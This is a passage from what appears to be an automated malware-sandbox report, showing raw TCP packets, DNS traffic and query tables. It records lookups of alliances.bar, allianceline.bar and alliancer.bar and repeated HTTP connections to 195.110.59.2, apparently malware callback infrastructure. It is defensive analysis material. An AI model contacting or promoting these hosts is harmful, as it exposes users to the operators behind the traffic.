                                                        Jul 27, 2021 10:57:53.368366957 CEST8049821195.110.59.2192.168.2.3
                                                        Jul 27, 2021 10:57:53.368398905 CEST8049822195.110.59.2192.168.2.3
                                                        Jul 27, 2021 10:57:53.368531942 CEST4982180192.168.2.3195.110.59.2
                                                        Jul 27, 2021 10:57:53.368720055 CEST4982280192.168.2.3195.110.59.2
                                                        Jul 27, 2021 10:57:53.369296074 CEST4982180192.168.2.3195.110.59.2
                                                        Jul 27, 2021 10:57:53.407707930 CEST8049821195.110.59.2192.168.2.3
                                                        Jul 27, 2021 10:57:53.407723904 CEST8049821195.110.59.2192.168.2.3
                                                        Jul 27, 2021 10:57:53.407860994 CEST4982180192.168.2.3195.110.59.2
                                                        Jul 27, 2021 10:57:53.412904978 CEST4982180192.168.2.3195.110.59.2
                                                        Jul 27, 2021 10:57:53.413059950 CEST4982280192.168.2.3195.110.59.2
                                                        Jul 27, 2021 10:57:53.452241898 CEST8049821195.110.59.2192.168.2.3
                                                        Jul 27, 2021 10:57:53.452270985 CEST8049822195.110.59.2192.168.2.3
                                                        Jul 27, 2021 10:57:53.452286959 CEST8049822195.110.59.2192.168.2.3
                                                        Jul 27, 2021 10:57:53.452370882 CEST4982280192.168.2.3195.110.59.2
                                                        Jul 27, 2021 10:57:53.452593088 CEST4982280192.168.2.3195.110.59.2
                                                        Jul 27, 2021 10:57:53.452940941 CEST4982380192.168.2.3195.110.59.2
                                                        Jul 27, 2021 10:57:53.452979088 CEST4982480192.168.2.3195.110.59.2
                                                        Jul 27, 2021 10:57:53.491767883 CEST8049822195.110.59.2192.168.2.3
                                                        Jul 27, 2021 10:57:53.491801977 CEST8049824195.110.59.2192.168.2.3
                                                        Jul 27, 2021 10:57:53.491820097 CEST8049823195.110.59.2192.168.2.3
                                                        Jul 27, 2021 10:57:53.491913080 CEST4982480192.168.2.3195.110.59.2
                                                        Jul 27, 2021 10:57:53.492100000 CEST4982380192.168.2.3195.110.59.2
                                                        Jul 27, 2021 10:57:53.492652893 CEST4982480192.168.2.3195.110.59.2
                                                        Jul 27, 2021 10:57:53.529687881 CEST8049824195.110.59.2192.168.2.3
                                                        Jul 27, 2021 10:57:53.529720068 CEST8049824195.110.59.2192.168.2.3
                                                        Jul 27, 2021 10:57:53.529782057 CEST4982480192.168.2.3195.110.59.2
                                                        Jul 27, 2021 10:57:53.531961918 CEST4982480192.168.2.3195.110.59.2
                                                        Jul 27, 2021 10:57:53.569206953 CEST8049824195.110.59.2192.168.2.3
                                                        Jul 27, 2021 10:57:54.384248972 CEST4982380192.168.2.3195.110.59.2

                                                        UDP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Jul 27, 2021 10:55:29.824219942 CEST5836153192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:55:29.854454994 CEST53583618.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:55:31.086102009 CEST6349253192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:55:31.110687971 CEST53634928.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:55:33.206926107 CEST6083153192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:55:33.235449076 CEST53608318.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:55:34.062549114 CEST6010053192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:55:34.117863894 CEST53601008.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:55:36.782522917 CEST5319553192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:55:36.813318968 CEST53531958.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:55:38.651355028 CEST5014153192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:55:38.676074982 CEST53501418.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:55:39.053106070 CEST5302353192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:55:39.091007948 CEST53530238.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:55:39.492876053 CEST4956353192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:55:39.520629883 CEST53495638.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:55:40.545783043 CEST5135253192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:55:40.581315994 CEST53513528.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:55:40.826142073 CEST5934953192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:55:40.851505041 CEST53593498.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:55:41.363559008 CEST5708453192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:55:41.368248940 CEST5882353192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:55:41.395991087 CEST53570848.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:55:41.402328968 CEST53588238.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:55:43.828834057 CEST5756853192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:55:43.877517939 CEST53575688.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:55:44.223083019 CEST5054053192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:55:44.260349989 CEST53505408.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:55:44.298887014 CEST5436653192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:55:44.333559990 CEST53543668.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:55:44.666543007 CEST5303453192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:55:44.705442905 CEST53530348.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:55:45.010859013 CEST5776253192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:55:45.023225069 CEST5543553192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:55:45.046161890 CEST53577628.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:55:45.059547901 CEST53554358.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:55:45.852927923 CEST5071353192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:55:45.893428087 CEST53507138.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:55:47.870244980 CEST5613253192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:55:47.906811953 CEST53561328.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:55:48.323859930 CEST5898753192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:55:48.363410950 CEST53589878.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:55:49.448729992 CEST5657953192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:55:49.475919008 CEST53565798.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:55:50.266046047 CEST6063353192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:55:50.299895048 CEST53606338.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:55:50.527328014 CEST6129253192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:55:50.565099001 CEST53612928.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:55:51.443006039 CEST6361953192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:55:51.478408098 CEST53636198.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:55:53.883807898 CEST6493853192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:55:53.925790071 CEST53649388.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:55:56.477703094 CEST6194653192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:55:56.507536888 CEST53619468.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:55:57.416102886 CEST6491053192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:55:57.443571091 CEST53649108.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:55:58.821554899 CEST5212353192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:55:58.903017998 CEST53521238.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:56:00.157525063 CEST5613053192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:56:00.197365046 CEST53561308.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:56:01.511719942 CEST5633853192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:56:01.546735048 CEST53563388.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:56:02.694979906 CEST5942053192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:56:02.729991913 CEST53594208.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:56:03.958976984 CEST5878453192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:56:03.993427992 CEST53587848.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:56:08.011437893 CEST6397853192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:56:08.050503969 CEST53639788.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:56:09.094834089 CEST6293853192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:56:09.128500938 CEST53629388.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:56:09.580077887 CEST5570853192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:56:09.629606009 CEST53557088.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:56:09.927855968 CEST5680353192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:56:09.979374886 CEST53568038.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:56:10.111707926 CEST6293853192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:56:10.141431093 CEST53629388.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:56:10.942735910 CEST5680353192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:56:10.971904039 CEST53568038.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:56:11.126580000 CEST6293853192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:56:11.154395103 CEST53629388.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:56:12.149965048 CEST5680353192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:56:12.186712980 CEST53568038.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:56:13.168299913 CEST6293853192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:56:13.197093010 CEST53629388.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:56:14.170923948 CEST5680353192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:56:14.201026917 CEST53568038.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:56:17.181109905 CEST6293853192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:56:17.209060907 CEST53629388.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:56:18.023281097 CEST5714553192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:56:18.077296019 CEST53571458.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:56:18.094135046 CEST5535953192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:56:18.132193089 CEST53553598.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:56:18.167503119 CEST5680353192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:56:18.203094006 CEST53568038.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:56:23.104465008 CEST5830653192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:56:23.146136045 CEST53583068.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:56:23.220622063 CEST6412453192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:56:23.250143051 CEST53641248.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:56:23.307050943 CEST4936153192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:56:23.343312979 CEST53493618.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:56:24.462047100 CEST6315053192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:56:24.501645088 CEST53631508.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:56:42.419178009 CEST5327953192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:56:42.457530975 CEST53532798.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:56:42.553977013 CEST5688153192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:56:42.603785992 CEST53568818.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:56:42.608755112 CEST5364253192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:56:42.643934011 CEST53536428.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:56:42.658066034 CEST5566753192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:56:42.690577984 CEST53556678.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:56:45.227165937 CEST5483353192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:56:45.255029917 CEST53548338.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:56:45.260967970 CEST6247653192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:56:45.293740034 CEST53624768.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:56:45.348171949 CEST4970553192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:56:45.380553961 CEST53497058.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:56:51.279489040 CEST6147753192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:56:51.314120054 CEST53614778.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:56:54.098944902 CEST6163353192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:56:54.132392883 CEST53616338.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:56:54.141966105 CEST5594953192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:56:54.176388979 CEST53559498.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:56:54.195920944 CEST5760153192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:56:54.219094992 CEST4934253192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:56:54.228425026 CEST53576018.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:56:54.256364107 CEST53493428.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:56:54.271682978 CEST5625353192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:56:54.308425903 CEST53562538.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:56:54.323792934 CEST4966753192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:56:54.360380888 CEST53496678.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:57:08.280250072 CEST5543953192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:57:08.311788082 CEST53554398.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:57:09.738255978 CEST5706953192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:57:09.772382975 CEST53570698.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:57:14.629486084 CEST5765953192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:57:14.669292927 CEST53576598.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:57:14.820266962 CEST5471753192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:57:14.862781048 CEST53547178.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:57:14.879625082 CEST6397553192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:57:14.916208029 CEST53639758.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:57:15.088474035 CEST5663953192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:57:15.130168915 CEST53566398.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:57:15.311506987 CEST5185653192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:57:15.337224007 CEST53518568.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:57:25.214365959 CEST5654653192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:57:25.265139103 CEST53565468.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:57:26.266536951 CEST5654653192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:57:26.298177004 CEST53565468.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:57:27.265353918 CEST5654653192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:57:27.290340900 CEST53565468.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:57:29.324911118 CEST5654653192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:57:29.349751949 CEST53565468.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:57:31.273332119 CEST6215253192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:57:31.300863028 CEST53621528.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:57:31.305362940 CEST5347053192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:57:31.324361086 CEST5644653192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:57:31.338237047 CEST53534708.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:57:31.341864109 CEST5963153192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:57:31.359699965 CEST53564468.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:57:31.377856970 CEST53596318.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:57:33.317445993 CEST5654653192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:57:33.342725039 CEST53565468.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:57:38.256019115 CEST5551553192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:57:38.300312996 CEST53555158.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:57:38.660528898 CEST6454753192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:57:38.699054003 CEST53645478.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:57:38.863775969 CEST5175953192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:57:38.910355091 CEST53517598.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:57:39.372251987 CEST5920753192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:57:39.412241936 CEST53592078.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:57:39.793953896 CEST5426953192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:57:39.829297066 CEST53542698.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:57:53.288501024 CEST5485653192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:57:53.324261904 CEST53548568.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:58:00.320586920 CEST6414053192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:58:00.355616093 CEST53641408.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:58:00.364860058 CEST6227153192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:58:00.392353058 CEST53622718.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:58:00.395559072 CEST5740453192.168.2.38.8.8.8
                                                        Jul 27, 2021 10:58:00.429327011 CEST53574048.8.8.8192.168.2.3
                                                        Jul 27, 2021 10:58:00.741730928 CEST6299753192.168.2.38.8.8.8

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                        Jul 27, 2021 10:55:40.826142073 CEST192.168.2.38.8.8.80x66c0Standard query (0)www.msn.comA (IP address)IN (0x0001)
                                                        Jul 27, 2021 10:55:43.828834057 CEST192.168.2.38.8.8.80xeb6bStandard query (0)web.vortex.data.msn.comA (IP address)IN (0x0001)
                                                        Jul 27, 2021 10:55:44.223083019 CEST192.168.2.38.8.8.80xbccfStandard query (0)geolocation.onetrust.comA (IP address)IN (0x0001)
                                                        Jul 27, 2021 10:55:44.298887014 CEST192.168.2.38.8.8.80xe40dStandard query (0)contextual.media.netA (IP address)IN (0x0001)
                                                        Jul 27, 2021 10:55:44.666543007 CEST192.168.2.38.8.8.80x5a80Standard query (0)btloader.comA (IP address)IN (0x0001)
                                                        Jul 27, 2021 10:55:45.010859013 CEST192.168.2.38.8.8.80x38ebStandard query (0)ad.doubleclick.netA (IP address)IN (0x0001)
                                                        Jul 27, 2021 10:55:45.023225069 CEST192.168.2.38.8.8.80xf174Standard query (0)ad-delivery.netA (IP address)IN (0x0001)
                                                        Jul 27, 2021 10:55:45.852927923 CEST192.168.2.38.8.8.80x34b9Standard query (0)lg3.media.netA (IP address)IN (0x0001)
                                                        Jul 27, 2021 10:55:47.870244980 CEST192.168.2.38.8.8.80x4586Standard query (0)hblg.media.netA (IP address)IN (0x0001)
                                                        Jul 27, 2021 10:55:48.323859930 CEST192.168.2.38.8.8.80x5dc6Standard query (0)cvision.media.netA (IP address)IN (0x0001)
                                                        Jul 27, 2021 10:55:49.448729992 CEST192.168.2.38.8.8.80xd7a2Standard query (0)srtb.msn.comA (IP address)IN (0x0001)
                                                        Jul 27, 2021 10:55:50.527328014 CEST192.168.2.38.8.8.80x2327Standard query (0)img.img-taboola.comA (IP address)IN (0x0001)
                                                        Jul 27, 2021 10:56:42.419178009 CEST192.168.2.38.8.8.80x19a7Standard query (0)alliances.barA (IP address)IN (0x0001)
                                                        Jul 27, 2021 10:56:51.279489040 CEST192.168.2.38.8.8.80x33a0Standard query (0)alliances.barA (IP address)IN (0x0001)
                                                        Jul 27, 2021 10:57:14.629486084 CEST192.168.2.38.8.8.80x6224Standard query (0)allianceline.barA (IP address)IN (0x0001)
                                                        Jul 27, 2021 10:57:14.820266962 CEST192.168.2.38.8.8.80x8b37Standard query (0)alliances.barA (IP address)IN (0x0001)
                                                        Jul 27, 2021 10:57:14.879625082 CEST192.168.2.38.8.8.80xd40eStandard query (0)allianceline.barA (IP address)IN (0x0001)
                                                        Jul 27, 2021 10:57:15.088474035 CEST192.168.2.38.8.8.80x372fStandard query (0)www.allianceline.barA (IP address)IN (0x0001)
                                                        Jul 27, 2021 10:57:15.311506987 CEST192.168.2.38.8.8.80x54d2Standard query (0)www.allianceline.barA (IP address)IN (0x0001)
                                                        Jul 27, 2021 10:57:31.324361086 CEST192.168.2.38.8.8.80x2a89Standard query (0)alliances.barA (IP address)IN (0x0001)
                                                        Jul 27, 2021 10:57:38.256019115 CEST192.168.2.38.8.8.80xdd1aStandard query (0)alliancer.barA (IP address)IN (0x0001)
                                                        Jul 27, 2021 10:57:38.660528898 CEST192.168.2.38.8.8.80x96b5Standard query (0)www.alliancer.barA (IP address)IN (0x0001)
                                                        Jul 27, 2021 10:57:39.372251987 CEST192.168.2.38.8.8.80xfe09Standard query (0)alliancer.barA (IP address)IN (0x0001)
                                                        Jul 27, 2021 10:57:39.793953896 CEST192.168.2.38.8.8.80xd4c2Standard query (0)www.alliancer.barA (IP address)IN (0x0001)
                                                        Jul 27, 2021 10:57:53.288501024 CEST192.168.2.38.8.8.80xe1a0Standard query (0)alliances.barA (IP address)IN (0x0001)

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                        Jul 27, 2021 10:55:40.851505041 CEST8.8.8.8192.168.2.30x66c0No error (0)www.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)
                                                        Jul 27, 2021 10:55:43.877517939 CEST8.8.8.8192.168.2.30xeb6bNo error (0)web.vortex.data.msn.comweb.vortex.data.microsoft.comCNAME (Canonical name)IN (0x0001)
                                                        Jul 27, 2021 10:55:44.260349989 CEST8.8.8.8192.168.2.30xbccfNo error (0)geolocation.onetrust.com104.20.185.68A (IP address)IN (0x0001)
                                                        Jul 27, 2021 10:55:44.260349989 CEST8.8.8.8192.168.2.30xbccfNo error (0)geolocation.onetrust.com104.20.184.68A (IP address)IN (0x0001)
                                                        Jul 27, 2021 10:55:44.333559990 CEST8.8.8.8192.168.2.30xe40dNo error (0)contextual.media.net23.211.6.95A (IP address)IN (0x0001)
                                                        Jul 27, 2021 10:55:44.705442905 CEST8.8.8.8192.168.2.30x5a80No error (0)btloader.com172.67.70.134A (IP address)IN (0x0001)
                                                        Jul 27, 2021 10:55:44.705442905 CEST8.8.8.8192.168.2.30x5a80No error (0)btloader.com104.26.7.139A (IP address)IN (0x0001)
                                                        Jul 27, 2021 10:55:44.705442905 CEST8.8.8.8192.168.2.30x5a80No error (0)btloader.com104.26.6.139A (IP address)IN (0x0001)
                                                        Jul 27, 2021 10:55:45.046161890 CEST8.8.8.8192.168.2.30x38ebNo error (0)ad.doubleclick.netdart.l.doubleclick.netCNAME (Canonical name)IN (0x0001)
                                                        Jul 27, 2021 10:55:45.046161890 CEST8.8.8.8192.168.2.30x38ebNo error (0)dart.l.doubleclick.net142.250.186.70A (IP address)IN (0x0001)
                                                        Jul 27, 2021 10:55:45.059547901 CEST8.8.8.8192.168.2.30xf174No error (0)ad-delivery.net172.67.69.19A (IP address)IN (0x0001)
                                                        Jul 27, 2021 10:55:45.059547901 CEST8.8.8.8192.168.2.30xf174No error (0)ad-delivery.net104.26.2.70A (IP address)IN (0x0001)
                                                        Jul 27, 2021 10:55:45.059547901 CEST8.8.8.8192.168.2.30xf174No error (0)ad-delivery.net104.26.3.70A (IP address)IN (0x0001)
                                                        Jul 27, 2021 10:55:45.893428087 CEST8.8.8.8192.168.2.30x34b9No error (0)lg3.media.net23.211.6.95A (IP address)IN (0x0001)
                                                        Jul 27, 2021 10:55:47.906811953 CEST8.8.8.8192.168.2.30x4586No error (0)hblg.media.net23.211.6.95A (IP address)IN (0x0001)
                                                        Jul 27, 2021 10:55:48.363410950 CEST8.8.8.8192.168.2.30x5dc6No error (0)cvision.media.netcvision.media.net.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                        Jul 27, 2021 10:55:49.475919008 CEST8.8.8.8192.168.2.30xd7a2No error (0)srtb.msn.comwww.msn.comCNAME (Canonical name)IN (0x0001)
                                                        Jul 27, 2021 10:55:49.475919008 CEST8.8.8.8192.168.2.30xd7a2No error (0)www.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)
                                                        Jul 27, 2021 10:55:50.565099001 CEST8.8.8.8192.168.2.30x2327No error (0)img.img-taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)
                                                        Jul 27, 2021 10:55:50.565099001 CEST8.8.8.8192.168.2.30x2327No error (0)tls13.taboola.map.fastly.net151.101.1.44A (IP address)IN (0x0001)
                                                        Jul 27, 2021 10:55:50.565099001 CEST8.8.8.8192.168.2.30x2327No error (0)tls13.taboola.map.fastly.net151.101.65.44A (IP address)IN (0x0001)
                                                        Jul 27, 2021 10:55:50.565099001 CEST8.8.8.8192.168.2.30x2327No error (0)tls13.taboola.map.fastly.net151.101.129.44A (IP address)IN (0x0001)
                                                        Jul 27, 2021 10:55:50.565099001 CEST8.8.8.8192.168.2.30x2327No error (0)tls13.taboola.map.fastly.net151.101.193.44A (IP address)IN (0x0001)
                                                        Jul 27, 2021 10:56:42.457530975 CEST8.8.8.8192.168.2.30x19a7No error (0)alliances.bar195.110.59.2A (IP address)IN (0x0001)
                                                        Jul 27, 2021 10:56:51.314120054 CEST8.8.8.8192.168.2.30x33a0No error (0)alliances.bar195.110.59.2A (IP address)IN (0x0001)
                                                        Jul 27, 2021 10:57:14.669292927 CEST8.8.8.8192.168.2.30x6224No error (0)allianceline.bar162.255.119.73A (IP address)IN (0x0001)
                                                        Jul 27, 2021 10:57:14.862781048 CEST8.8.8.8192.168.2.30x8b37No error (0)alliances.bar195.110.59.2A (IP address)IN (0x0001)
                                                        Jul 27, 2021 10:57:14.916208029 CEST8.8.8.8192.168.2.30xd40eNo error (0)allianceline.bar162.255.119.73A (IP address)IN (0x0001)
                                                        Jul 27, 2021 10:57:15.130168915 CEST8.8.8.8192.168.2.30x372fNo error (0)www.allianceline.barparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)
                                                        Jul 27, 2021 10:57:15.130168915 CEST8.8.8.8192.168.2.30x372fNo error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)
                                                        Jul 27, 2021 10:57:15.130168915 CEST8.8.8.8192.168.2.30x372fNo error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)
                                                        Jul 27, 2021 10:57:15.130168915 CEST8.8.8.8192.168.2.30x372fNo error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)
                                                        Jul 27, 2021 10:57:15.130168915 CEST8.8.8.8192.168.2.30x372fNo error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)
                                                        Jul 27, 2021 10:57:15.130168915 CEST8.8.8.8192.168.2.30x372fNo error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)
                                                        Jul 27, 2021 10:57:15.130168915 CEST8.8.8.8192.168.2.30x372fNo error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)
                                                        Jul 27, 2021 10:57:15.130168915 CEST8.8.8.8192.168.2.30x372fNo error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)
                                                        Jul 27, 2021 10:57:15.337224007 CEST8.8.8.8192.168.2.30x54d2No error (0)www.allianceline.barparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)
                                                        Jul 27, 2021 10:57:15.337224007 CEST8.8.8.8192.168.2.30x54d2No error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)
                                                        Jul 27, 2021 10:57:15.337224007 CEST8.8.8.8192.168.2.30x54d2No error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)
                                                        Jul 27, 2021 10:57:15.337224007 CEST8.8.8.8192.168.2.30x54d2No error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)
                                                        Jul 27, 2021 10:57:15.337224007 CEST8.8.8.8192.168.2.30x54d2No error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)
                                                        Jul 27, 2021 10:57:15.337224007 CEST8.8.8.8192.168.2.30x54d2No error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)
                                                        Jul 27, 2021 10:57:15.337224007 CEST8.8.8.8192.168.2.30x54d2No error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)
                                                        Jul 27, 2021 10:57:15.337224007 CEST8.8.8.8192.168.2.30x54d2No error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)
